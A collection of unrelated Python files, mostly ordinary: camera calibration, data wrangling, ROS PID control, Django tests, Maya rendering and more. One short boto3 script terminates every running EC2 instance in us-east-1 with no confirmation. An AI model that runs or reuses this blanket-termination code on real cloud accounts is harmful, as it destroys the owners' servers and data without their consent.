    if cameraMatrix is None or distCoeffs is None:
        print("Calibration issue. Remove ./calibration.pckl and recalibrate your camera with CalibrateCamera.py.")
        exit()
    else:
        print('Calibration file read succesfully!')
    return cameraMatrix, distCoeffs
def getCalibrationFrame():
    """Grab and return the 30th frame from the capture device.

    Discards the first 29 frames (e.g. so the sensor settles before a
    frame is used for calibration).
    """
    # NOTE(review): device index 206 is unusual for VideoCapture — verify
    # this is the intended capture device on the target machine.
    cam = cv2.VideoCapture(206)
    # request 1920x1080 and disable autofocus
    cam.set(cv2.CAP_PROP_FRAME_WIDTH,1920)
    cam.set(cv2.CAP_PROP_FRAME_HEIGHT,1080)
    cam.set(cv2.CAP_PROP_AUTOFOCUS, 0)
    fr = 0  # frames successfully read so far
    while(cam.isOpened()):
        ret, img = cam.read()
        if ret:
            fr += 1
            if fr == 30:
                # NOTE(review): the camera is never released, and the
                # function returns None if the stream closes early.
                return img
    #return cv2.undistort(img, cameraMatrix, distCoeffs)
def estimatePoseToBoard(_img, cameraMatrix, distCoeffs):
    """Estimate the camera pose relative to the ChArUco board.

    Detects ArUco markers in `_img`, refines them against CHARUCO_BOARD,
    drops the robot marker (id 49), interpolates ChArUco corners and
    estimates the board pose.  Writes an annotated 'calib_board.png'.

    Returns (R, tvec): a 3x3 rotation matrix (via Rodrigues) and the
    translation vector.

    Raises RuntimeError when the board is not sufficiently visible.
    (The original used `assert 1==0`, which is stripped under `python -O`
    and would then crash below in cv2.Rodrigues(None).)
    """
    img = _img.copy()
    # grayscale image
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Detect Aruco markers
    corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, ARUCO_DICT, parameters=ARUCO_PARAMETERS)
    # Refine detected markers:
    # eliminates markers not part of our board, adds missing markers to the board
    corners, ids, rejectedImgPoints, recoveredIds = aruco.refineDetectedMarkers(image = gray,
            board = CHARUCO_BOARD,
            detectedCorners = corners,
            detectedIds = ids,
            rejectedCorners = rejectedImgPoints,
            cameraMatrix = cameraMatrix,
            distCoeffs = distCoeffs)
    # Remove id 49 (the robot marker) so it cannot skew the board pose
    corners, ids = removeMarkerById(corners, ids, 49)
    img = aruco.drawDetectedMarkers(img, corners, ids=ids, borderColor=(0, 0, 255))
    rvec, tvec = None, None
    # Only try to find the CharucoBoard if we found enough markers
    if ids is not None and len(ids) > 10:
        # Get charuco corners and ids from detected aruco markers
        response, charuco_corners, charuco_ids = aruco.interpolateCornersCharuco(markerCorners=corners,
                markerIds=ids,
                image=gray,
                board=CHARUCO_BOARD)
        # Require more than 20 squares
        if response is not None and response > 20:
            # Estimate the posture of the charuco board
            pose, rvec, tvec = aruco.estimatePoseCharucoBoard(charucoCorners=charuco_corners,
                    charucoIds=charuco_ids,
                    board=CHARUCO_BOARD,
                    cameraMatrix=cameraMatrix,
                    distCoeffs=distCoeffs)
            img = aruco.drawAxis(img, cameraMatrix, distCoeffs, rvec, tvec, 2)
            cv2.imwrite('calib_board.png', img)
    if rvec is None or tvec is None:
        # covers both failure paths: too few markers, or too few squares
        raise RuntimeError('Calibration board is not fully visible')
    return cv2.Rodrigues(rvec)[0], tvec
def estimatePoseToMarker(_img, cameraMatrix, distCoeffs):
    """Estimate the camera pose relative to the single robot marker (id 49).

    Returns (R, tvec): a 3x3 rotation matrix (via Rodrigues) and a (3, 1)
    translation vector.  Writes an annotated 'calib_marker.png'.
    """
    img = _img.copy()
    # grayscale image
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Detect Aruco markers
    corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, ARUCO_DICT, parameters=ARUCO_PARAMETERS)
    ## Keep ID 49 (the robot marker)
    corners, ids = keepMarkerById(corners, ids, 49)
    img = aruco.drawDetectedMarkers(img, corners, ids=ids, borderColor=(0, 0, 255))
    # NOTE(review): markerLength 0.1965 — presumably metres; confirm units
    rvec, tvec, _ = aruco.estimatePoseSingleMarkers(corners=corners,
            markerLength=0.1965,
            cameraMatrix=cameraMatrix,
            distCoeffs=distCoeffs)
    img = aruco.drawAxis(img, cameraMatrix, distCoeffs, rvec, tvec, 2)
    cv2.imwrite('calib_marker.png', img)
    return cv2.Rodrigues(rvec)[0], tvec.reshape(3,1)
def removeMarkerById(corners, ids, id2remove):
    """Filter out every marker whose id equals `id2remove`.

    Parameters
    ----------
    corners : sequence
        per-marker corner arrays, parallel to `ids`
    ids : ndarray
        (n, 1) array of marker ids
    id2remove : int
        id to drop

    Returns (newCorners, newIds) with newIds reshaped to (-1, 1).
    """
    newCorners = []
    newIds = []
    for i in range(0, len(ids)):
        # .item() replaces np.asscalar(), which was removed in NumPy 1.23
        marker_id = ids[i].item()
        if marker_id != id2remove:
            newCorners.append(corners[i])
            newIds.append(marker_id)
    return newCorners, np.asarray(newIds).reshape(-1,1)
def keepMarkerById(corners, ids, id2keep):
    """Keep only the markers whose id equals `id2keep`.

    Mirror image of removeMarkerById: same inputs, but retains matches.
    Returns (newCorners, newIds) with newIds reshaped to (-1, 1).
    """
    newCorners = []
    newIds = []
    for i in range(0, len(ids)):
        # .item() replaces np.asscalar(), which was removed in NumPy 1.23
        marker_id = ids[i].item()
        if marker_id == id2keep:
            newCorners.append(corners[i])
            newIds.append(marker_id)
    return newCorners, np.asarray(newIds).reshape(-1,1)
def getPoseFromRotationTranslation(rvec, tvec):
    """Build a 4x4 homogeneous transform from a 3x3 rotation and (3, 1) translation."""
    top = np.hstack((rvec, tvec))
    bottom = np.array([[0., 0., 0., 1.]])
    return np.vstack((top, bottom))
def getRotationTranslationFromPose(C):
    """Split a 4x4 homogeneous transform into its rotation and translation.

    Returns (rvec, tvec): the 3x3 rotation block and the translation
    column as a flat (3,) view — matching the original's shapes.
    """
    return C[0:3, 0:3], C[0:3, 3]
if __name__ == '__main__':
    # Compute the camera->robot transform by composing three homogeneous
    # transforms: board pose, inverse marker pose, and a hand-measured
    # marker-to-robot offset.  The result is pickled for later use.
    np.set_printoptions(suppress=True)
    # Read camera calibration
    cameraMatrix, distCoeffs = readCameraCalibration()
    # Read one frame (after discarding 30)
    img = getCalibrationFrame()
    #cv2.imwrite('robot-cameras-calibration.png', img)
    rvec_board, tvec_board = estimatePoseToBoard(img, cameraMatrix, distCoeffs)
    rvec_marker, tvec_marker = estimatePoseToMarker(img, cameraMatrix, distCoeffs)
    # Manual measurements between marker and robot
    # (identity rotation; offsets presumably metres — confirm)
    r = np.eye(3, dtype=float)
    t = np.array([0.03, 0.25, -0.510], dtype=float).reshape(3,1)
    C_marker2robot = getPoseFromRotationTranslation(r, t)
    C_board2camera = getPoseFromRotationTranslation(rvec_board , tvec_board )
    C_marker2camera = getPoseFromRotationTranslation(rvec_marker, tvec_marker)
    #TESTING
    '''
    point1, _ = cv2.projectPoints(np.array([0.2,0.,0.], dtype=float).reshape(1,3), rvec_board, tvec_board, cameraMatrix, distCoeffs)
    point2, _ = cv2.projectPoints(np.array([0.1, 0., 0.], dtype=float).reshape(1,3), rvec_marker, tvec_marker, cameraMatrix, distCoeffs)
    point1 = point1.squeeze().astype(int)
    point2 = point2.squeeze().astype(int)
    cv2.circle(img, tuple(point1), 10, (0,255,0), -1)
    cv2.circle(img, tuple(point2), 10, (255,255,0), -1)
    cv2.imwrite('test.png', img)
    assert 1==0
    '''
    #######
    # chain the transforms: marker->robot ∘ inv(marker->camera) ∘ board->camera
    C = np.matmul(np.matmul(C_marker2robot, inv(C_marker2camera)), C_board2camera)
    # sanity probe: map the board origin through C (result left unprinted)
    p = np.array([0.,0.,0.,1.], dtype=float).reshape(4,1)
    pr = np.matmul(C, p)
    #print(pr)
    # Dump projection matrix to file
    f = open('data/calibration/cameras_robot.pckl', 'wb')
    pickle.dump((C), f)
    f.close()
    print('Camera to robot transformation succesfully computed')
|
# Terminate every running EC2 instance in the region, then report what is
# still visible (running or stopping) shortly afterwards.
from collections import defaultdict
import boto3
import time
region = 'us-east-1'
ec2 = boto3.resource('ec2', region_name=region)
# NOTE(review): this is destructive -- every instance currently in the
# 'running' state in us-east-1 is terminated immediately.
ec2_filter = [{'Name': 'instance-state-name', 'Values': ['running']}]
ec2.instances.filter(Filters=ec2_filter).terminate()
# Re-query for instances still winding down (running or stopping).
instance_status = ec2.instances.filter(Filters=[{
    'Name': 'instance-state-name',
    'Values': ['running', 'stopping']}])
# Give AWS a moment to reflect the state change before reading it back.
time.sleep(5)
ec2info = defaultdict()
for instance in instance_status:
    ec2info[instance.id] = {
        'Type': instance.instance_type,
        'ID': instance.id,
        'State': instance.state['Name'],
        'Private IP': instance.private_ip_address,
    }
# Print a small fixed set of attributes for each surviving instance.
attributes = ['Type', 'ID', 'State', 'Private IP']
for instance_id, instance in ec2info.items():
    for key in attributes:
        print("{0}: {1}".format(key, instance[key]))
    print("-------------------------")
|
# String-slicing demo on ASCII and Korean (Unicode) text.
txt1 = 'A tale that was not right'
txt2 = '이 또한 지나가리라.'
for piece in (txt1[3:7], txt1[:6], txt2[-4:]):
    print(piece)
|
from numpy import genfromtxt
import csv
# Split feature vectors and class labels into per-cluster train/test CSV
# files, based on a cluster-membership file ("vnoc") of article numbers.
# NOTE(review): the 'rU'/'wb' open modes and csv usage are Python 2 style;
# under Python 3 csv.writer on a binary-mode file raises TypeError.
clusterinfo="/Users/mengqizhou/Desktop/datamining/assignment5/algorithm2/14/cosine_14.csv"#vnoc
tan="/Users/mengqizhou/Desktop/datamining/assignment5/algorithm2/test_article_numbers.csv"#test article number
tran="/Users/mengqizhou/Desktop/datamining/assignment5/algorithm2/training_article_numbers.csv"#training article number
allvector="/Users/mengqizhou/Desktop/datamining/assignment5/feature_vectors.csv"
alllabel="/Users/mengqizhou/Desktop/datamining/assignment5/algorithm2/binary_class_labels.csv"
folder="/Users/mengqizhou/Desktop/datamining/assignment5/algorithm2/14/"
vnoc=[]
# Read the cluster membership rows (one cluster per row).
with open(clusterinfo,'rU') as f:
    reader = csv.reader(f)
    for row in reader:
        vnoc.append(row)
# Redundant: the 'with' block above has already closed the file.
f.close()
# Drop empty cells from every row (trailing commas in the CSV).
temps=[]
for row in vnoc:
    temp=[]
    for value in row:
        if value!='':
            temp.append(value)
    temps.append(temp)
vnoc=temps
# Article-number arrays defining the train/test split.
test=genfromtxt(tan,dtype=int,delimiter=',')
#test=np.array(vnoc)
training=genfromtxt(tran,dtype=int,delimiter=',')
#training=np.array(vnoc)
# All feature vectors, indexed by article number.
vectors=[]
with open (allvector,'rU') as f:
    reader=csv.reader(f)
    for row in reader:
        vectors.append(row)
f.close()
# All class labels, indexed by article number.
labels=[]
with open (alllabel,'rU') as f:
    reader=csv.reader(f)
    for row in reader:
        labels.append(row)
f.close()
#figure out for the training data, which cluster it is in
#output:training_vector_1,2,3...8; training_label_1,2,...8
#output: test_vector_1,2,3...; training_label_1,2,...8
for i in range(0,len(vnoc)):
    tevs=[]#test vectors
    tels=[]#test labels
    trvs=[]#training vectors
    trls=[]#training labels
    # Route each article in cluster i into the test or training buckets.
    for n in vnoc[i]:
        num=int(n)
        if num in test:
            tevs.append(vectors[num])
            tels.append(labels[num])
        elif num in training:
            trvs.append(vectors[num])
            trls.append(labels[num])
    # Write the four per-cluster CSV files.
    # NOTE: 'f.close' below (no parentheses) does not call close(); it is a
    # no-op attribute access -- harmless, since 'with' already closed f.
    with open(folder+"test_vectors_"+str(i)+".csv", 'wb') as f:
        writer = csv.writer(f)
        for item in tevs:
            writer.writerow(item)
    f.close
    with open(folder+"test_labels_"+str(i)+".csv", 'wb') as f:
        writer = csv.writer(f)
        for item in tels:
            writer.writerow(item)
    f.close
    with open(folder+"training_vectors_"+str(i)+".csv", 'wb') as f:
        writer = csv.writer(f)
        for item in trvs:
            writer.writerow(item)
    f.close
    with open(folder+"training_labels_"+str(i)+".csv", 'wb') as f:
        writer = csv.writer(f)
        for item in trls:
            writer.writerow(item)
    f.close
|
import tkinter as tk
import PyPDF2
from PIL import Image, ImageTk
# Smoke test: confirm the imports load, then open an empty Tk window.
print('Is this working?')
root = tk.Tk()
# Blocks here until the window is closed by the user.
root.mainloop()
|
#!/usr/bin/env python
# coding: utf-8
# Notebook export: fetch San Francisco air-traffic passenger data (JSON API)
# and frame it with pandas; the ML cells at the end were left empty.
# # Necessary Libraries
# Define the necessary libraies.
# Data can be accessed by both JSON and CSV.
# In this part, we will read from JSON format and create simple ML.
# In[1]:
#source:
#https://data.sfgov.org/resource/rkru-6vcg.json
#https://data.world/singgih/airtrafficpassengerdataproject-4-11-2021/workspace/file?agentid=data-society&datasetid=air-traffic-passenger-data&filename=Air_Traffic_Passenger_Statistics.csv
import requests
import pandas as pd
from pandas.io.json import json_normalize
#from mlxtend.plotting import plot_decision_regions
from sklearn.metrics import confusion_matrix,classification_report
import matplotlib.pyplot as plt #used to plot graphs
import numpy as np
from sklearn import datasets, neighbors
import itertools
import random
from sklearn.cluster import KMeans
import csv
# # Get Response Air Traffic API:
# In[2]:
data_response = requests.get("https://data.sfgov.org/resource/rkru-6vcg.json") ## <== Air Traffic API
# # See Response Code (you should get 200 OK)
# for more information : https://developer.mozilla.org/en-US/docs/Web/HTTP/Status
#
# 200 means that the response is successfully sent
# In[3]:
print(data_response.status_code)
# # Let's see your Raw Data
# In[4]:
print(data_response.json())
# Now, put the JSON format in the frame to make it easier to understand
# In[5]:
# Second fetch of the same endpoint, this time parsed directly by pandas.
data_json = pd.read_json("https://data.sfgov.org/resource/rkru-6vcg.json")
# NOTE: outside a notebook the bare .head() expressions below are no-ops
# (their values are discarded).
data_json.head(5)
# See the data only based on "activity period" and Passenger Count" (coloumn)
# In[6]:
df1=data_json[["activity_period", "geo_region", "activity_type_code", "passenger_count"]]
df1.head()
# # Now We want to see specifically for "deplaned" activity
# It can be use to predict how many tourist come to this airport
# In[ ]:
# In[ ]:
# # Predict the Air Traffic in the future
# Using the data in 2020, we want to predict tourist coming to the airport
# In[ ]:
# In[ ]:
|
# Signature-only stubs for distance-regular graph algorithms
# (matches the public API of networkx.algorithms.distance_regular).
def is_distance_regular(G): ...
def global_parameters(b, c): ...
def intersection_array(G): ...
def is_strongly_regular(G): ...
|
import numpy as np
import networkx as nx
import bsp
import matplotlib.pyplot as plt
# Build a BSP tree from four 2-D line segments and plot the raw input (top
# subplot) against the tree's per-node colinear segment sets (bottom subplot).
segments = np.array([
    [[-1.5, 0], [2, 0]],
    [[-2, -1], [-2, 1]],
    [[2, -2], [6, 2]],
    [[-1, -4], [-4, 2]]
])
tree = bsp.build_tree(segments)
fig = plt.figure(figsize=(8,8))
# Top subplot: the original segments in black.
axis = plt.subplot(2,1,1)
axis.grid()
for segment in segments:
    axis.plot(*(segment.T), "o-", color='k', linewidth=3, markersize=12)
# Bottom subplot: one colored series per BSP node's colinear segment set.
ax2 = plt.subplot(2,1,2)
# NOTE: this loop variable shadows the 'segments' array defined above.
for _,segments in tree.nodes.data('colinear_segments'):
    for segment in segments:
        ax2.plot(*(segment.T), "o-", linewidth=3, markersize=12)
ax2.grid()
# Match the bottom axes limits to the top plot for a fair visual comparison.
ax2.set_xlim(axis.get_xlim())
ax2.set_ylim(axis.get_ylim())
plt.show()
|
# Given a string S and a character C, return an array of integers
# representing the shortest distance from the character C in the string.
class Solution:
    def shortestToChar(self, S, C):
        """Return, for each index of S, the distance to the nearest occurrence of C.

        Two linear sweeps (left-to-right, then right-to-left) replace the
        original O(len(S) * count(C)) scan with an O(len(S)) pass.
        Assumes C occurs at least once in S (as the original did: it would
        raise on min() of an empty sequence otherwise).
        """
        n = len(S)
        INF = float('inf')
        res = [INF] * n
        # Left-to-right: distance to the closest C at or before each index.
        prev = -INF
        for i in range(n):
            if S[i] == C:
                prev = i
            res[i] = i - prev
        # Right-to-left: tighten with the closest C at or after each index.
        prev = INF
        for i in range(n - 1, -1, -1):
            if S[i] == C:
                prev = i
            res[i] = min(res[i], prev - i)
        return res
if __name__ == "__main__":
    # Demo run: distances to the nearest 'o' in the sample word.
    sample, target = "marcoseibellissimo", 'o'
    print(Solution().shortestToChar(sample, target))
|
# Deprecation shim: re-export the dialog model classes from slack_sdk under
# the legacy 'slack' namespace, then warn callers to migrate.
# NOTE(review): the submodule is spelled 'dialoags' here -- confirm this
# matches the module name shipped by the installed slack_sdk version.
from slack_sdk.models.dialoags import AbstractDialogSelector # noqa
from slack_sdk.models.dialoags import DialogChannelSelector # noqa
from slack_sdk.models.dialoags import DialogConversationSelector # noqa
from slack_sdk.models.dialoags import DialogExternalSelector # noqa
from slack_sdk.models.dialoags import DialogStaticSelector # noqa
from slack_sdk.models.dialoags import DialogTextArea # noqa
from slack_sdk.models.dialoags import DialogTextComponent # noqa
from slack_sdk.models.dialoags import DialogTextField # noqa
from slack_sdk.models.dialoags import DialogUserSelector # noqa
from slack_sdk.models.dialoags import TextElementSubtypes # noqa
from slack import deprecation
# Emit the standard deprecation warning pointing at the replacement module.
deprecation.show_message(__name__, "slack_sdk.models.blocks")
|
# -*- coding: utf-8 -*-
from model_mommy import mommy
from django.test import TestCase
from app.customer.models import Customer
from app.fleet import models
class ModelsTestCase(TestCase):
    """Fleet model tests: CNH (driver's licence) category validation and misc.

    Each test sets a licence type on the customer and a category on the
    vehicle, then checks Fleet._validate_cnh_type / can_rent agreement.
    """
    def setUp(self):
        # Baseline fixtures: an 'A'-licence customer and an arbitrary vehicle.
        self.customer = mommy.make(Customer, cnh_type=['A'])
        self.vehicle = mommy.make(models.Fleet)
    def test_validate_cnh_type_a_motorcycle_true(self):
        # Licence 'A' (from setUp) must allow a motorcycle.
        self.vehicle.category = 'motorcycle'
        self.vehicle.save()
        self.assertTrue(self.vehicle._validate_cnh_type(self.customer))
    def test_validate_cnh_type_b_car_true(self):
        # Licence 'B' must allow a car.
        self.customer.cnh_type = ['B']
        self.customer.save()
        self.vehicle.category = 'car'
        self.vehicle.save()
        self.assertTrue(self.vehicle._validate_cnh_type(self.customer))
    def test_validate_cnh_type_c_utility_true(self):
        # Licence 'C' must allow a utility vehicle.
        self.customer.cnh_type = ['C']
        self.customer.save()
        self.vehicle.category = 'utility'
        self.vehicle.save()
        self.assertTrue(self.vehicle._validate_cnh_type(self.customer))
    def test_validate_cnh_type_d_truck_true(self):
        # Licence 'D' must allow a truck.
        self.customer.cnh_type = ['D']
        self.customer.save()
        self.vehicle.category = 'truck'
        self.vehicle.save()
        self.assertTrue(self.vehicle._validate_cnh_type(self.customer))
    def test_validate_cnh_type_e_truck_true(self):
        # Licence 'E' must also allow a truck.
        self.customer.cnh_type = ['E']
        self.customer.save()
        self.vehicle.category = 'truck'
        self.vehicle.save()
        self.assertTrue(self.vehicle._validate_cnh_type(self.customer))
    def test_validate_cnh_type_false(self):
        # Mismatch: 'A'-licence customer (setUp) may not drive a car.
        self.vehicle.category = 'car'
        self.vehicle.save()
        self.assertFalse(self.vehicle._validate_cnh_type(self.customer))
    def test_can_rent(self):
        # can_rent should agree with the licence check for a valid pairing.
        self.vehicle.category = 'motorcycle'
        self.vehicle.save()
        self.assertTrue(self.vehicle.can_rent(self.customer))
    def test_unicode(self):
        # __unicode__ should render the vehicle name.
        self.vehicle.vehicle_name = 'Palio'
        self.vehicle.save()
        self.assertEqual(self.vehicle.__unicode__(), 'Palio')
|
import pandas as pd
import numpy as np
import talib as ta
import tushare as ts
import matplotlib.pyplot as plt
def OBV(ts_code):
    """Compute On-Balance Volume (OBV) for *ts_code* and run a back test.

    Fetches daily K-line data via tushare, derives the OBV series manually
    (keeping TA-Lib's OBV alongside for cross-checking), plots the close
    prices, and hands closes + OBV to back_test() (defined elsewhere in
    this file).
    """
    # Fetch daily bars for the requested stock.  Fix: the original ignored
    # the ts_code argument and always fetched "600647".
    dw = ts.get_k_data(ts_code)
    # Drop the oldest 300 rows and re-index from zero.
    dw = dw[300:]
    dw.index = range(len(dw))
    # TA-Lib's OBV, kept for comparison with the manual computation below.
    obvta = ta.OBV(dw['close'].values, dw['volume'].values)
    # Manual OBV: add volume on an up day, subtract on a down day,
    # carry the previous value when the close is unchanged.
    obv = []
    for i in range(0, len(dw)):
        if i == 0:
            obv.append(dw['volume'].values[i])
        else:
            if dw['close'].values[i] > dw['close'].values[i-1]:
                obv.append(obv[-1] + dw['volume'].values[i])
            if dw['close'].values[i] < dw['close'].values[i-1]:
                obv.append(obv[-1] - dw['volume'].values[i])
            if dw['close'].values[i] == dw['close'].values[i-1]:
                obv.append(obv[-1])
    dw['obv'] = obv
    plt.plot(dw['close'].values)
    # Delegate the trading simulation to back_test (the inline, commented-out
    # simulation and its sum/total/asset bookkeeping were removed as dead code).
    back_test(np.array(dw['close'].values), obv)
OBV("600600")
|
#!/usr/bin/env python
import rospy
import time
import math
from geometry_msgs.msg import Vector3
from geometry_msgs.msg import PoseStamped
from std_msgs.msg import Empty
from pid_class import PID
from rosgraph_msgs.msg import Clock
from std_msgs.msg import String
class PositionController():
    """ROS node logic: PID position controller for a UAV.

    Subscribes to GPS pose and position setpoints, and publishes velocity
    commands computed by three independent PIDs (one per axis).
    """
    def __init__(self):
        # Allow the simulator to start
        time.sleep(5)
        # When this node shutsdown
        rospy.on_shutdown(self.shutdown_sequence)
        # Set the rate
        # NOTE(review): self.rate (100 Hz) is passed to the PIDs, but
        # ControlLoop() below actually runs at rospy.Rate(50) -- confirm
        # which rate is intended.
        self.rate = 100.0
        self.dt = 1.0 / self.rate
        # Getting the PID parameters (defaults to a pure P controller).
        stable_gains = rospy.get_param('/position_controller_node/gains/stable/', {'p': 1, 'i': 0.0, 'd': 0.0})
        Kp_s, Ki_s, Kd_s = stable_gains['p'], stable_gains['i'], stable_gains['d']
        # If the speed is set to unstable waypoint
        Kp = Kp_s
        Ki = Ki_s
        Kd = Kd_s
        # Display incoming parameters
        rospy.loginfo(str(rospy.get_name()) + ": Launching with the following parameters:")
        rospy.loginfo(str(rospy.get_name()) + ": p - " + str(Kp))
        rospy.loginfo(str(rospy.get_name()) + ": i - " + str(Ki))
        rospy.loginfo(str(rospy.get_name()) + ": d - " + str(Kd))
        rospy.loginfo(str(rospy.get_name()) + ": rate - " + str(self.rate))
        # Creating the PID's (identical gains on all three axes)
        self.pos_x_PID = PID(Kp, Ki, Kd, self.rate)
        self.pos_y_PID = PID(Kp, Ki, Kd, self.rate)
        self.pos_z_PID = PID(Kp, Ki, Kd, self.rate)
        # Get the setpoints (default hover target: 3 m above the origin)
        self.x_setpoint = 0
        self.y_setpoint = 0
        self.z_setpoint = 3
        # Create the current output readings
        self.x_pos = 0
        self.y_pos = 0
        self.z_pos = 0
        # Create the subscribers and publishers
        # NOTE(review): despite its name, vel_set_sub is a Publisher.
        self.vel_set_sub = rospy.Publisher('/uav/input/velocity', Vector3, queue_size=1)
        self.gps_sub = rospy.Subscriber("uav/sensors/gps", PoseStamped, self.get_gps)
        self.pos_set_sub = rospy.Subscriber("uav/input/position", Vector3, self.set_pos)
        # Run the communication node (blocks until shutdown)
        self.ControlLoop()
    # This is the main loop of this class
    def ControlLoop(self):
        """Publish PID velocity commands at a fixed rate until shutdown."""
        # Set the rate
        rate = rospy.Rate(50)
        # Keep track how many loops have happend
        loop_counter = 0
        # While running
        while not rospy.is_shutdown():
            # Use a PID to calculate the velocity you want
            x_proportion = self.pos_x_PID.get_output(self.x_setpoint, self.x_pos)
            y_proportion = self.pos_y_PID.get_output(self.y_setpoint, self.y_pos)
            z_proportion = self.pos_z_PID.get_output(self.z_setpoint, self.z_pos)
            # Initialize the components of the vector
            x_vel = 0
            y_vel = 0
            z_vel = 0
            # Set the velocity based on distance
            x_vel = x_proportion
            y_vel = y_proportion
            z_vel = z_proportion
            # Create and publish the data
            velocity = Vector3(x_vel, y_vel, z_vel)
            self.vel_set_sub.publish(velocity)
            # Sleep any excess time
            rate.sleep()
    # Call back to get the gps data
    def get_gps(self, msg):
        """Cache the latest GPS position from the PoseStamped message."""
        self.x_pos = msg.pose.position.x
        self.y_pos = msg.pose.position.y
        self.z_pos = msg.pose.position.z
    # Call back to get the position setpoints
    def set_pos(self, msg):
        """Update the target position; reset PID integrators on any change."""
        # If our set point changes reset the PID build up
        check_x = self.x_setpoint != msg.x
        check_y = self.y_setpoint != msg.y
        check_z = self.z_setpoint != msg.z
        if check_x or check_y or check_z:
            self.pos_x_PID.remove_buildup()
            self.pos_y_PID.remove_buildup()
            self.pos_z_PID.remove_buildup()
        self.x_setpoint = msg.x
        self.y_setpoint = msg.y
        self.z_setpoint = msg.z
    # Called on ROS shutdown
    def shutdown_sequence(self):
        """Log that the node is stopping; no hardware cleanup is required."""
        rospy.loginfo(str(rospy.get_name()) + ": Shutting Down")
def main():
    # Initialise the ROS node, then hand control to PositionController,
    # whose constructor blocks in its control loop until shutdown.
    rospy.init_node('position_controller_node')
    try:
        poscon = PositionController()
    except rospy.ROSInterruptException:
        pass
if __name__ == '__main__':
    main()
|
#!/usr/bin/env python3
#
# Copyright (C) 2020 Cambridge Astronomical Survey Unit
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <https://www.gnu.org/licenses/>.
#
from ifu.workflow.utils import populate_fits_table_template
def create_mos_field_cat(mos_field_template,
                         data_dict,
                         output_filename,
                         trimester,
                         author,
                         report_verbosity=1,
                         cc_report='',
                         overwrite=False):
    """Write a MOS field catalogue by filling a FITS template.

    Parameters
    ----------
    mos_field_template : str
        FITS file containing the MOS field template to populate.
    data_dict : dict
        Mapping of column name to list/array of values used to fill the
        template's table columns.
    output_filename : str
        Destination path of the generated catalogue.
    trimester : str
        Observing trimester identifier (e.g. 2020A1).
    author : str
        Email address of the catalogue's author.
    report_verbosity : {0, 1}, optional
        Verbosity level inherited by the files submitted to WASP.
    cc_report : str, optional
        Comma-separated email addresses to CC on WASP submissions.
    overwrite : bool, optional
        Whether an existing output file may be replaced.

    Returns
    -------
    str
        The path of the file that was written (output_filename).
    """
    assert report_verbosity in [0, 1]
    # Header keywords destined for the primary HDU of the output file.
    primary_kwds = dict(TRIMESTE=trimester,
                        VERBOSE=report_verbosity,
                        AUTHOR=author,
                        CCREPORT=cc_report)
    populate_fits_table_template(mos_field_template,
                                 data_dict,
                                 output_filename,
                                 primary_kwds=primary_kwds,
                                 update_datetime=True,
                                 overwrite=overwrite)
    return output_filename
|
import maya.cmds as cmds  # Maya Python commands
import maya.mel  # access to Maya Embedded Language from Python
# Rotate the selected object(s) through every X/Y/Z angle combination in
# 45-degree steps and save a render for each camera view above the ground plane.
s = cmds.ls(selection=True)  # current user selection (object/camera/path, ...)
camName = cmds.listCameras()
cName = camName[0]  # first camera in the scene
cx = 0  # start angles at zero degrees on each axis
cy = 0
cz = 0
v = 45  # increment angle (degrees)
im = 0  # count of images written so far
while cx <= 360:  # sweep the X axis
    for a in s:
        x = a + "." + "rotate" + "X"  # attribute name for the X rotation
        cmds.setAttr(x, cx)  # rotate on X axis
    cy = 0
    while cy <= 360:  # sweep the Y axis
        for a in s:
            x = a + "." + "rotate" + "Y"  # attribute name for the Y rotation
            cmds.setAttr(x, cy)
        cz = 0
        while cz <= 360:  # sweep the Z axis
            for a in s:
                x = a + "." + "rotate" + "Z"  # attribute name for the Z rotation
                cmds.setAttr(x, cz)
            cp = cmds.xform(cName, q=True, ws=True, rp=True)  # cp = camera position
            if cp[1] > 0:  # capture only views above the ground plane
                # Fix: the original called 'mel.eval', but 'import maya.mel'
                # only binds the name 'maya', so 'mel' was a NameError.
                maya.mel.eval('renderWindowRender redoPreviousRender renderView')  # open render view
                editor = 'renderView'
                # Save the render to the specified path in the local directory.
                cmds.renderWindowEditor(editor, e=True, refresh=True,
                                        writeImage=(r'Path_Name' + '_X' + str(cx) +
                                                    '_Y' + str(cy) + '_Z' + str(cz)))
                im = im + 1
            cz = cz + v
        cy = cy + v
    cx = cx + v
|
# Sean Kim
# Unit 3 Review Problem 11
def get_scores ():
    """Read whitespace-separated name/score pairs from stdin until a blank line.

    Returns a dict mapping each name to its score (score kept as a string,
    exactly as typed).
    """
    scores = {}
    print ("Enter the name/score pairs separated by a space.")
    entry = input().strip()
    while entry:
        fields = entry.split()
        scores[fields[0]] = fields[1]
        entry = input().strip()
    return scores
def main ():
    # Print the name->score dict gathered from the interactive prompt.
    print (get_scores())
main()
|
from pprint import pprint
import os
# Verify that every device/screenshot combination exists as a .png inside
# each per-language subfolder of the current directory, and report any
# missing or unexpected files.
devices = [
    'iPhone SE',
    'iPhone 8',
    'iPhone 8 Plus',
    'iPhone X',
    'iPhone XS Max',
]
screenshots = [
    '10_Wallet',
    '20_History',
    '30_Channels',
    '40_Receive',
]
# Full cartesian product of expected file names.
expected = set()
for device in devices:
    for screenshot in screenshots:
        expected.add(f'{device}-{screenshot}.png')
print(expected)
# Each immediate subdirectory is assumed to be one localization.
subfolders = [f.path for f in os.scandir('.') if f.is_dir() ]
for language in subfolders:
    existing = set([os.path.basename(f.path) for f in os.scandir(language) if f.is_file() and f.path.endswith('.png') ])
    missing = expected.difference(existing)
    additional = existing.difference(expected)
    if missing or additional:
        print(f"\n{language}\n------------------------------------")
        # NOTE(review): exit_code is assigned but never read -- a trailing
        # sys.exit(exit_code) was probably intended.
        exit_code = 1
        if missing:
            print("⚠️ Missing Screenshots:")
            pprint(missing)
        if additional:
            print("⚠️ Additional Screenshots:")
            pprint(additional)
|
import time, pytest
import sys,os
sys.path.insert(1,os.path.abspath(os.path.join(os.path.dirname( __file__ ),'..','..','lib')))
from clsCommon import Common
import clsTestService
from localSettings import *
import localSettings
